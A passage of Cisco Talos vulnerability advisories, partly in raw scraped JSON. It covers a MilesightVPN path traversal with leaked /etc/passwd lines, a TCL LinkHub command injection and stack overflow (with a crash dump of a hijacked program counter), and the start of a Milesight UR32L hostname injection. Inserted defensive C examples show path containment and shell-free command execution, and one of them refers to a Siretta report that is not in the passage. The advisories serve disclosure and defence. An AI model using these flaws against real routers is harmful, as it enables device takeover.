    lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
    vboxadd:x:997:1::/var/run/vboxadd:/bin/false
    fwupd-refresh:x:112:119:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
    mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false
    redis:x:1002:1002::/home/redis:/bin/false
    stund:x:1003:1003::/home/stund:/bin/false
    tunnel:x:1004:1004::/bin:/bin/false

The response to the request is the content of `/etc/passwd`.

##### VENDOR RESPONSE

Since the maintainer of this software did not release a patch during the 90-day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco's Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html
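The check missing before `[1]` above is a containment test on the resolved path. The following C is an added example, not MilesightVPN code, of a lexical normaliser that resolves `.` and `..` segments of a request path and rejects any path that would climb above the web root before it is handed to the filesystem; `/srv/www` is a placeholder root, and percent-decoding is assumed to have happened already.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 1024

/* Lexically resolve a request path under `root`: '.' segments are dropped,
 * '..' pops the previous segment and repeated '/' collapse. The result is
 * written to `out` and 0 returned only if the path never climbs above the
 * root; a path that would escape (like the report's "/../etc/passwd")
 * returns -1 rather than being silently clamped, so the request can be
 * refused and logged. Percent-decoding must already have happened, and the
 * filesystem is not consulted, so `root` itself must be trusted. */
int resolve_under_root(const char *root, const char *pathname,
                       char *out, size_t out_len)
{
    char norm[PATH_BUF];
    size_t seg_start[PATH_BUF / 2];   /* offset in norm where each segment begins */
    size_t depth = 0, n = 0;
    const char *p = pathname;

    while (*p != '\0') {
        while (*p == '/')
            p++;
        if (*p == '\0')
            break;
        const char *seg = p;
        while (*p != '\0' && *p != '/')
            p++;
        size_t len = (size_t)(p - seg);

        if (len == 1 && seg[0] == '.')
            continue;
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (depth == 0)
                return -1;            /* would leave the web root */
            n = seg_start[--depth];
            continue;
        }
        if (n + 1 + len >= sizeof norm || depth >= sizeof seg_start / sizeof seg_start[0])
            return -1;                /* does not fit */
        seg_start[depth++] = n;
        norm[n++] = '/';
        memcpy(norm + n, seg, len);
        n += len;
    }
    norm[n] = '\0';

    int written = snprintf(out, out_len, "%s%s", root, n > 0 ? norm : "/");
    return (written < 0 || (size_t)written >= out_len) ? -1 : 0;
}

/* Convenience for a yes/no answer: 1 if `pathname` stays under `root`. */
int path_is_contained(const char *root, const char *pathname)
{
    char resolved[PATH_BUF];
    return resolve_under_root(root, pathname, resolved, sizeof resolved) == 0;
}
```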
##### TIMELINE

2023-02-14 - Initial Vendor Contact

2023-02-21 - Vendor Disclosure

2023-07-06 - Public Release

##### Credit

Discovered by Francesco Benvenuto of Cisco Talos.

* * *

# Talos Vulnerability Report

### TALOS-2022-1458

## TCL LinkHub Mesh Wifi confsrv ucloud_add_node OS command injection vulnerability

##### August 1, 2022
##### CVE Number

CVE-2022-22140

##### SUMMARY

An OS command injection vulnerability exists in the confsrv ucloud_add_node functionality of TCL LinkHub Mesh Wi-Fi MS1G_00_01.00_14. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a malicious packet to trigger this vulnerability.

##### CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

TCL LinkHub Mesh Wifi MS1G_00_01.00_14

##### PRODUCT URLS

LinkHub Mesh Wifi - <https://www.tcl.com/us/en/products/connected-home/linkhub/linkhub-mesh-wifi-system-3-pack>

##### CVSSv3 SCORE

9.6 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

##### CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

##### DETAILS

The LinkHub Mesh Wi-Fi system is a node-based mesh system designed for Wi-Fi deployments across large homes. These nodes include most features standard in current Wi-Fi solutions and allow for easy expansion of the system by adding nodes. The mesh is managed solely by a phone application, and the routers have no web-based management console.

The LinkHub Mesh system uses protobuffers to communicate both internally on the device and externally with the controlling phone application. These protobuffers can be sent to port 9003 while on the Wi-Fi provided by the LinkHub Mesh in order to issue commands, much like the phone application would. Once the protobuffer is received, it is routed internally starting from the `ucloud` binary and is dispatched to the appropriate handler.

In this case, the handler is `confsrv`, which handles many message types.
Here we are interested in `MxpManageList`.

    message MxpManage {
        required string serialNum = 1;   [1]
        required int32 opt = 2;
    }
    message MxpManageList {
        repeated MxpManage mxp = 1; //This is not optional, so it must be resolved by hand to compile to .proto
        optional uint64 timestamp = 2;
    }

Using [1] we have control over the `serialNum` in the packet. The data within the protobuffer is parsed in `ucloud_add_node`.

    00428478  int32_t ucloud_add_node(int32_t arg1, int32_t arg2, int32_t arg3)
    00428498      arg_0 = arg1
    004284a4      int32_t $a3
    004284a4      arg_c = $a3
    004284a8      int32_t var_12c = 0
    004284ac      int32_t var_130 = 0
    004284cc      void var_128
    004284cc      memset(&var_128, 0, 0x100)
    004284d8      int32_t var_28 = 0
    004284dc      int32_t var_24 = 0
    004284e0      int32_t var_20 = 0
    004284e4      int32_t var_1c = 0
    004284e8      int32_t var_18 = 0
    004284ec      int32_t var_14 = 0
    004284f0      int32_t var_10 = 0
    004284f4      int32_t var_c = 0
    004284fc      int32_t $v0_1
    004284fc      if (arg2 == 0) {
    00428524          _td_snprintf(3, "api/map_manage.c", 0x737, " in is null ! \n", 0x4ae4b0)
    00428530          $v0_1 = 0xffffffff
    00428530      } else {
    00428558          struct MxpManageList* $v0_3 = mxp_manage_list__unpack(0, arg3, arg2)
    0042856c          if ($v0_3 == 0) {
    00428594              _td_snprintf(3, "api/map_manage.c", 0x73d, " unpack failed ! \n", 0x4ae4b0)
    004285a0              $v0_1 = 0xffffffff
    004285a0          } else {
    004286b0              for (uint32_t var_130_1 = 0; var_130_1 u< $v0_3->mxp_manage_count; var_130_1 = var_130_1 + 1) {
    004285d0                  if (confctl_module_debug_en(module_id: 9) != 0) {
    00428618                      printf("\x1b[1;32m[%s][%d] : \x1b[0m\x1b…", "ucloud_add_node", 0x743, *(*($v0_3->p_mxp + (var_130_1 << 2)) + 0xc), 0x4ae4b0)
    00428494                  }
    0042864c                  update_add_node_list(serial_number: *(*($v0_3->p_mxp + (var_130_1 << 2)) + 0xc))
    00428688                  doSystemCmd("echo %s >> /proc/mesh/authorized", *(*($v0_3->p_mxp + (var_130_1 << 2)) + 0xc))   [2]
    00428670              }
    004286c0              if ($v0_3->is_timestamp_present != 0) {
    004286f0                  sprintf(&var_28, "%llu", $v0_3->timestamp.d, $v0_3->timestamp:4.d, 0x4ae4b0)
    00428714                  SetValue(name: "sys.cfg.stamp", input_buffer: &var_28)
    00428708              }
    00428728              CommitCfm()
    00428744              mxp_manage_list__free_unpacked($v0_3, 0)
    00428750              $v0_1 = 0
    00428750          }
    00428750      }
    00428764      return $v0_1

At [2] the `serialNum` is used directly in `doSystemCmd`.

    000209b0  int32_t doSystemCmd(int32_t arg1, int32_t arg2)
    000209d0      arg_4 = arg2
    000209d4      int32_t $a2
    000209d4      arg_8 = $a2
    000209d8      int32_t $a3
    000209d8      arg_c = $a3
    000209fc      void var_408
    000209fc      memset(&var_408, 0, 0x400)
    00020a30      log_debug_print("doSystemCmd", &data_1b8d, 0, 0x80, 0x55500) {"function entry!"}
    00020a64      vsnprintf(&var_408, 0x400, arg1, &arg_4)
    00020a80      int32_t $v0_1 = system(&var_408)
    00020ab8      log_debug_print("doSystemCmd", &data_1b93, 0, 0x80, 0x55510) {"function exit!"}
    00020ad8      return $v0_1

A quick look at `doSystemCmd` shows that no escaping happens here: the format string is expanded with `vsnprintf` and handed straight to `system`, so this is a simple command injection using `serialNum` directly.

##### TIMELINE

2022-04-27 - Vendor Disclosure

2022-08-01 - Public Release

##### Credit

Discovered by Carl Hurd of Cisco Talos.

* * *
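The Siretta `m2m_parse_router_config` report (TALOS-2022-1640) and the TCL `ucloud_add_node` report above share one root cause: attacker-controlled text is formatted into a command line for `system`. The following C is an added example, not code from Talos, Siretta or TCL, showing the defensive shape for both cases: the `key=value&key=value` list is parsed into validated pairs, `nvram set` is run through `execvp` with an argument vector so no shell ever parses the value, and a serial number is accepted only after an allow-list check (the validated string would then be written to the authorized-nodes file with stdio calls rather than through `echo`). It assumes `nvram set` accepts `key=value` as a single argument, and the length and character limits are the example's own.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

#define NVRAM_KEY_MAX   64     /* assumed limits; the reports give none */
#define NVRAM_VALUE_MAX 255
#define SERIAL_MAX      32

/* One validated key=value pair destined for "nvram set". */
typedef struct {
    char key[NVRAM_KEY_MAX + 1];
    char value[NVRAM_VALUE_MAX + 1];
} nvram_pair;

/* Keys: identifier characters only. Values: a short allow-list, so quotes,
 * spaces, ';', '|', '`', '$' and '&' can never reach the command. */
static int key_char_ok(unsigned char c)   { return isalnum(c) || c == '_' || c == '.'; }
static int value_char_ok(unsigned char c) { return isalnum(c) || (c && strchr("-_.:/@,", c)); }

/* Parse "<key>=<value>&<key>=<value>..." (the layout m2m_parse_router_config
 * expects) into validated pairs. Returns the pair count, or -1 on the first
 * malformed, over-long or disallowed pair so nothing is applied half-way. */
int parse_router_config(const char *data, size_t data_len,
                        nvram_pair *out, size_t max_out)
{
    size_t n = 0, i = 0;

    while (i < data_len && data[i] != '\0') {
        while (i < data_len && data[i] == '&')          /* skip separators */
            i++;
        size_t start = i;
        while (i < data_len && data[i] != '&' && data[i] != '\0')
            i++;
        size_t pair_len = i - start;
        if (pair_len == 0)
            continue;
        const char *pair = data + start;
        const char *eq = memchr(pair, '=', pair_len);
        if (eq == NULL)
            return -1;
        size_t klen = (size_t)(eq - pair);
        size_t vlen = pair_len - klen - 1;
        if (klen == 0 || klen > NVRAM_KEY_MAX || vlen > NVRAM_VALUE_MAX || n == max_out)
            return -1;
        for (size_t j = 0; j < klen; j++)
            if (!key_char_ok((unsigned char)pair[j]))
                return -1;
        for (size_t j = 0; j < vlen; j++)
            if (!value_char_ok((unsigned char)eq[1 + j]))
                return -1;
        memcpy(out[n].key, pair, klen);
        out[n].key[klen] = '\0';
        memcpy(out[n].value, eq + 1, vlen);
        out[n].value[vlen] = '\0';
        n++;
    }
    return (int)n;
}

/* Apply one pair as "nvram set key=value" without a shell: argv goes straight
 * to execvp, so metacharacters in the value are data, never syntax.
 * Returns the child's exit status, or -1 on fork/exec/wait failure. */
int run_nvram_set(const nvram_pair *p)
{
    char assignment[NVRAM_KEY_MAX + 1 + NVRAM_VALUE_MAX + 1];
    snprintf(assignment, sizeof assignment, "%s=%s", p->key, p->value);
    char *argv[] = { "nvram", "set", assignment, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], argv);
        _exit(127);                                     /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* TCL case: accept a serial number only as 1..SERIAL_MAX alphanumerics or '-'
 * (assumed format); anything else never reaches /proc/mesh/authorized. */
int serial_ok(const char *serial)
{
    size_t len = strlen(serial);
    if (len == 0 || len > SERIAL_MAX)
        return 0;
    for (size_t i = 0; i < len; i++)
        if (!isalnum((unsigned char)serial[i]) && serial[i] != '-')
            return 0;
    return 1;
}
```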
# Talos Vulnerability Report

### TALOS-2022-1482

## TCL LinkHub Mesh Wi-Fi confsrv addTimeGroup stack-based buffer overflow vulnerability

##### August 1, 2022

##### CVE Number

CVE-2022-25996

##### SUMMARY

A stack-based buffer overflow vulnerability exists in the confsrv addTimeGroup functionality of TCL LinkHub Mesh Wi-Fi MS1G_00_01.00_14. A specially-crafted network packet can lead to a buffer overflow.
An attacker can send a malicious packet to trigger this vulnerability.

##### CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

TCL LinkHub Mesh Wifi MS1G_00_01.00_14

##### PRODUCT URLS

LinkHub Mesh Wifi - <https://www.tcl.com/us/en/products/connected-home/linkhub/linkhub-mesh-wifi-system-3-pack>

##### CVSSv3 SCORE

8.8 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

##### CWE

CWE-121 - Stack-based Buffer Overflow

##### DETAILS

The LinkHub Mesh Wi-Fi system is a node-based mesh system designed for Wi-Fi deployments across large homes. These nodes include most features standard in current Wi-Fi solutions and allow for easy expansion of the system by adding nodes. The mesh is managed solely by a phone application, and the routers have no web-based management console.

The LinkHub Mesh system uses protobuffers to communicate both internally on the device and externally with the controlling phone application. These protobuffers can be sent to port 9003 while on the Wi-Fi provided by the LinkHub Mesh in order to issue commands, much like the phone application would. Once the protobuffer is received, it is routed internally starting from the `ucloud` binary and is dispatched to the appropriate handler.

In this case, the handler is `confsrv`, which handles many message types. Here we are interested in `TimeGroup` and `TimeRule`.

    message TimeRule {
        required int32 id = 1;
        required string desc = 2;
        required bool enable = 3;
        required string week = 4;   [1]
        required int32 begin_in_min = 5;
        required int32 end_in_min = 6;
    }
    message TimeGroup {
        repeated TimeRule tm_rule = 1;
        optional uint64 timestamp = 2;
    }

Using [1] we have control over `week` in the packet.
The parsing of the data in the protobuf is done in `set_time_group_rule`.

    0041acb8  int32_t set_time_group_rule(struct TimeGroup* pkt)

    0041acf8      void var_e4
    0041acf8      memset(&var_e4, 0, 0x80)
    0041ad04      int32_t var_e8 = 0
    0041ad08      int32_t var_ec = 0
    0041ad0c      int32_t var_f0 = 0
    0041ad10      int32_t var_64 = 0
    0041ad14      int32_t var_60 = 0
    0041ad18      int32_t var_5c = 0
    0041ad1c      int32_t var_58 = 0
    0041ad20      int32_t var_54 = 0
    0041ad24      int32_t var_50 = 0
    0041ad40      GetValue(name: "log.time.enable", output_buffer: &var_5c)
    0041ad70      if (atoi(&var_5c) == 1) {
    0041ada0          printf("Debug->%s: %s(%d)--\n", "../conf_time_group_api.c", "set_time_group_rule", 0xba)
    0041ad94      }
    0041af58      uint32_t var_100
    0041af58      for (int32_t loop_idx = 0; loop_idx u< pkt->tm_rule_count; loop_idx = loop_idx + 1) {
    0041adcc          struct TimeRule* $v0_5 = *(pkt->tm_rules + (loop_idx << 2))
    0041add4          int32_t var_4c = 0
    0041add8          int32_t var_48_1 = 0
    0041addc          int32_t var_44_1 = 0
    0041ade0          int32_t var_40_1 = 0
    0041adfc          GetValue(name: "log.time.enable", output_buffer: &var_4c)
    0041ae2c          if (atoi(&var_4c) == 1) {
    0041ae44              var_100 = pkt->tm_rule_count
    0041ae68              printf("Debug->%s: %s(%d)--\nn_tm_rule =…", "../conf_time_group_api.c", "set_time_group_rule", 0xbf, var_100)
    0041ae68          }
    0041ae78          if ($v0_5 != 0) {
    0041ae90              addTimeGroup($v0_5, var_ec)   [2]
    ...

At [2] the parsing is passed off to `addTimeGroup` if the `TimeGroup` reports having more than 0 `tm_rule`.
The `TimeRule` protobuffer is passed into `addTimeGroup` for further parsing.

    00419eb4  int32_t addTimeGroup(struct TimeRule* arg1, int32_t arg2)

    00419ef8      uint8_t var_108[0x80]
    00419ef8      memset(&var_108, 0, 0x80)
    00419f04      uint8_t var_88[0x20]
    00419f04      var_88[0].d = 0
    00419f08      var_88[4].d = 0
    00419f0c      var_88[8].d = 0
    00419f10      var_88[0xc].d = 0
    00419f14      var_88[0x10].d = 0
    00419f18      var_88[0x14].d = 0
    00419f1c      var_88[0x18].d = 0
    00419f20      var_88[0x1c].d = 0
    00419f24      int32_t var_68 = 0
    00419f28      int32_t var_64 = 0
    00419f2c      int32_t var_60 = 0
    00419f30      int32_t var_5c = 0
    00419f34      int32_t var_58 = 0
    00419f38      int32_t var_54 = 0
    00419f44      char var_50 = 0
    00419f48      char var_4f = 0
    00419f4c      char var_4e = 0
    00419f50      char var_4d = 0
    00419f54      char var_4c = 0
    00419f58      char var_4b = 0
    00419f5c      char var_4a = 0
    00419f60      char var_49 = 0
    00419f64      int32_t var_10c = 0
    00419f68      int32_t var_110 = 0
    00419f6c      int32_t var_48 = 0
    00419f70      int32_t var_44 = 0
    00419f74      int32_t var_40 = 0
    00419f78      int32_t var_3c = 0
    00419f7c      int32_t var_38 = 0
    00419f80      int32_t var_34 = 0
    00419f84      int32_t var_30 = 0
    00419f88      int32_t var_2c = 0
    00419f8c      int32_t var_28 = 0
    00419f90      int32_t var_24 = 0
    00419f94      int32_t var_20 = 0
    00419f98      int32_t var_1c = 0
    00419fb4      GetValue(name: "log.time.enable", output_buffer: &var_28)
    00419fe4      if (atoi(&var_28) == 1) {
    0041a014          printf("Debug->%s: %s(%d)--\n", "../conf_time_group_api.c", "addTimeGroup", 0x38)
    0041a008      }
    0041a028      if (arg1->week != 0) {
    0041a04c          strcpy(&var_68, arg1->week)   [3]
    0041a034      }
    ...

At [3] we can clearly see that if `week` is populated within the `TimeRule` protobuf, a `strcpy` is performed without any validation of buffer or input length, which can lead to a stack-based buffer overflow.
Below we can verify the issue in ASM:\n \n \n 0041a024 1800428c lw $v0, 0x18($v0) {TimeRule::week} [4]\n 0041a028 0b004010 beqz $v0, 0x41a058\n 0041a02c 00000000 nop \n \n 0041a030 4001c28f lw $v0, 0x140($fp) {arg_0}\n 0041a034 1800428c lw $v0, 0x18($v0) {TimeRule::week}\n 0041a038 d800c327 addiu $v1, $fp, 0xd8 {var_68}\n 0041a03c 21206000 move $a0, $v1 {var_68} [5]\n 0041a040 21284000 move $a1, $v0\n 0041a044 7c86828f lw $v0, -0x7984($gp) {strcpy}\n 0041a048 21c84000 move $t9, $v0\n 0041a04c 09f82003 jalr $t9 [6]\n 0041a050 00000000 nop \n \n\nAt [4] we see that the `week` value is loaded from the protobuf and checked to see if it is non-zero. At [5] the stack-buffer is being loaded as the `dst` argument for `strcpy`, and at [6] we see that `strcpy` is being called with no additional validation or verification of the buffer or input length. This leads to a simple stack-based buffer overflow.\n\n### Crash Information\n \n \n Program received signal SIGSEGV, Segmentation fault.\n 0x41414141 in ?? 
()\n [ Legend: Modified register | Code | Heap | Stack | String ]\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 registers \u2500\u2500\u2500\u2500\n $zero: 0x0\n $at : 0x806f0000\n $v0 : 0x1\n $v1 : 0x0\n $a0 : 0x0\n $a1 : 0x7fffffff\n $a2 : 0xa\n $a3 : 0x1\n $t0 : 0x7fadd019 \u2192 0x00000000\n $t1 : 0x7fadd018 \u2192 0x00000000\n $t2 : 0x5\n $t3 : 0x19999999\n $t4 : 0x777fa8e4 \u2192 0x0000000b (\"\n \"?)\n $t5 : 0x0\n $t6 : 0x22\n $t7 : 0x0\n $s0 : 0x7fadd348 \u2192 0x82011607\n $s1 : 0x7fadd348 \u2192 0x82011607\n $s2 : 0x77612a60 \u2192 \"uc_api_lib.c\"\n $s3 : 0x0\n $s4 : 0x77613be4 \u2192 \"_session_read_and_dispatch\"\n $s5 : 0x775f9090 \u2192 lui gp, 0x3\n $s6 : 0x7e\n $s7 : 0x10\n $t8 : 0x1\n $t9 : 0x0\n $k0 : 0x0\n $k1 : 0x0\n $s8 : 0x41414141 (\"AAAA\"?)\n $pc : 0x41414141 (\"AAAA\"?)\n $sp : 0x7fadd030 \u2192 0x004bb900 \u2192 0x004bba68 \u2192 \"CMD_MESH_WLAN_SET\"\n $hi : 0x5\n $lo : 0x19999999\n $fir : 0x0\n $ra : 0x41414141 (\"AAAA\"?)\n $gp : 0x004ae4b0 \u2192 0x00000000\n 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 stack \u2500\u2500\u2500\u2500\n 0x7fadd030\u2502+0x0000: 0x004bb900 \u2192 0x004bba68 \u2192 \"CMD_MESH_WLAN_SET\" \u2190 $sp\n 0x7fadd034\u2502+0x0004: 0x00000000\n 0x7fadd038\u2502+0x0008: 0x00000000\n 0x7fadd03c\u2502+0x000c: 0x00000000\n 0x7fadd040\u2502+0x0010: 0x00000000\n 0x7fadd044\u2502+0x0014: 0x00000000\n 0x7fadd048\u2502+0x0018: 0x004ae4b0 \u2192 0x00000000\n 0x7fadd04c\u2502+0x001c: 0x00000000\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 code:mips:MIPS32 \u2500\u2500\u2500\u2500\n [!] Cannot disassemble from $PC\n [!] 
Cannot access memory at address 0x41414140\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 threads \u2500\u2500\u2500\u2500\n [#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV\n \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 trace \u2500\u2500\u2500\u2500\n 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 \n \n\n##### TIMELINE\n\n2022-03-16 - Vendor Disclosure \n2022-08-01 - Public Release\n\n##### Credit\n\nDiscovered by Carl Hurd of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1484\n\nPrevious Report\n\nTALOS-2022-1463\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-01T00:00:00", "type": "talos", "title": "TCL LinkHub Mesh Wi-Fi confsrv addTimeGroup stack-based buffer overflow vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25996"], "modified": "2022-08-01T00:00:00", "id": "TALOS-2022-1482", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1482", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:39", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1699\n\n## Milesight UR32L libzebra.so change_hostname OS command injection vulnerability\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-22659\n\n##### SUMMARY\n\nAn os command injection vulnerability exists in the libzebra.so change_hostname functionality of Milesight UR32L v32.3.0.5. A specially-crafted network packets can lead to command execution. An attacker can send a sequence of requests to trigger this vulnerability.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers telnet and sshd services. Both, when provided with the correct credentials, will allow access to the Router console. 
This is an interactive shell to modify the router settings.\n\nHere is the prompt after the login:\n \n \n *** TERMINFO:/etc/terminfo TERM:linux *****\n -- model:UR32L,sn:<redacted>,hwver:0300 partnumber:<redacted>--\n \n -------------------------------------------------------------------------\n Product Model : UR32L\n Firmware Version : 32.3.0.5\n -------------------------------------------------------------------------\n \n ROUTER> \n \n\nThe service offers several functions, and the number available depends on the user's privileges. The admin user can access the `enable` command, which opens a high-privilege command menu:\n \n \n ROUTER> enable \n ROUTER# \n cellular-gps-dev\n clear Reset functions\n configure Configuration from vty interface\n copy Copy from one file to another\n core Set debug level\n debug Debugging functions (see also 'undebug')\n disable Turn off privileged mode command\n enable Turn on privileged mode command\n end End current mode and change to enable mode\n exit Exit current mode and down to previous mode\n list Print command list\n modbus-master\n no Negate a command or set its defaults\n ping Send echo messages\n quit Exit current mode and down to previous mode\n reload Halt and perform a cold restart\n show Show running system information\n ssh Open an ssh connection\n telnet Open a telnet connection\n terminal Set terminal line parameters\n test Test\n traceroute Trace route to destination\n undebug Disable debugging functions (see also 'debug')\n write Write running configuration to memory, network, or terminal\n \n\nThe command that we are going to analyze is called `hostname`. It is invoked as `hostname <new_hostname>` and is used to change the hostname of the device. 
